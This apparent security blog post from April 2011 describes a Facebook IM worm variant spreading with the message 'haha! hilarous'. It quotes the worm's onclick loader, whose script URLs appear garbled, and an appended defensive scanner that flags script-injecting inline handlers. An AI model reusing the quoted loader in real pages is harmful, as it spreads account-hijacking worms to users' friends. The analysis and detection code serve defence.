Monthly Archives: April 2011

new variant of Facebook April Fool’s IM worm

There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous”; the page behind the URL shortener is (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:

javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='! hilarous'; }

[Screenshot: Facebook Bully Down worm]

Whatever it loads seems to Facebook Like the link and then IM your friends. I got three messages in a short span of time. Not sure what's required to send IMs through Facebook; it might be that it uses a fake login page to steal credentials like other variants.
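A defender-side check for this pattern, as an added example that is not from the original post: it scans markup for inline handlers or javascript: URLs that create a script element and assign its src, the way the handler above does. The indicator names, function names and the sample markup (including the example.invalid URL) are constructed for illustration.

```javascript
// Added example: static triage of inline handlers and javascript: URLs.
// Indicator names and the sample markup below are constructed for illustration.
const INDICATORS = {
  createsScript: /createElement\(\s*['"]script['"]\s*\)/i,
  assignsSrc: /\.src\s*=/i,
  touchesOpener: /window\.opener/i,
  closesWindow: /window\.close\s*\(/i,
};

// Undo encodings commonly seen in scraped markup so the patterns match.
function normalize(code) {
  return code
    .replace(/&quot;|&#34;/g, '"')
    .replace(/&#39;|&apos;/g, "'")
    .replace(/[\u2018\u2019]/g, "'")
    .replace(/[\u201C\u201D]/g, '"');
}

// Pull the code out of on* attributes and javascript: hrefs.
function extractInlineCode(html) {
  const out = [];
  const attr = /\s(on[a-z]+|href)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  for (const m of html.matchAll(attr)) {
    const name = m[1].toLowerCase();
    const value = (m[2] !== undefined ? m[2] : m[3]).trim();
    if (name === 'href' && !/^javascript:/i.test(value)) continue;
    out.push({ attribute: name, code: normalize(value) });
  }
  return out;
}

// Keep only code that both creates a <script> element and assigns a src.
function scanHtml(html) {
  return extractInlineCode(html)
    .map(({ attribute, code }) => {
      const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(code));
      const injectsScript = hits.includes('createsScript') && hits.includes('assignsSrc');
      return { attribute, hits, injectsScript };
    })
    .filter((f) => f.injectsScript);
}

// Constructed sample: one handler shaped like the one above, one benign.
const SAMPLE = `
<a href="#" onclick="javascript:if(window.opener){window.opener.document.body.appendChild(document.createElement(&#39;script&#39;)).src=&#39;https://example.invalid/x.js&#39;;window.close();}">Play video</a>
<a href="/help" onclick="track('help')">Help</a>`;

console.log(JSON.stringify(scanHtml(SAMPLE), null, 2));
```

The touchesOpener and closesWindow hits are context only: a handler that writes into window.opener and then closes its own window is modifying the page the user came from, which is what lets the injected script run in the original tab.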

